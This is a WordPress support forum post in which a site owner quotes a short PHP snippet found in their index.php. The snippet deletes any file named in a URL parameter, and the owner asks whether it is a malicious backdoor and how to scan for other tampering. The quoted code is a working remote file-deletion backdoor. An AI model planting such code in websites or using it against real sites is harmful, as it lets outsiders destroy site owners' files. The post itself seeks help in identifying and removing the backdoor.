WordPress.org

Forums

backdoor (1 post)

  1. bobbyl76
    Member
    Posted 1 year ago #

    A coder friend found what he said was a type of kill switch backdoor in my index.php file. It was worked on by a freelancer from over seas. The code looks like this

    code
    if(isset($_GET['del']) && $_GET['del']=='yes'){

    $path = $_SERVER['SCRIPT_FILENAME'];
    $file = $_GET['filename'];

    $fullpath = "wp-content/themes/forest/".$file;

    $fpath = str_replace("index.php", $fullpath,$path);
    unlink($fpath);
    code

    He says this code could allow anyone with the url and knowledge of the code to delete my index page.

    Is this true?

    If it is. Beyond removing this code from the index.php, is there a way to check for any other kinds of code? I have "All in one WP Security" and it never found this exploit. My friend also suggested I find a plugin to check to see if any of the core wordpress files have been tampered with.

    Can anyone recommend something and/or advise if that code is malicious?

Topic Closed

This topic has been closed to new replies.

About this Topic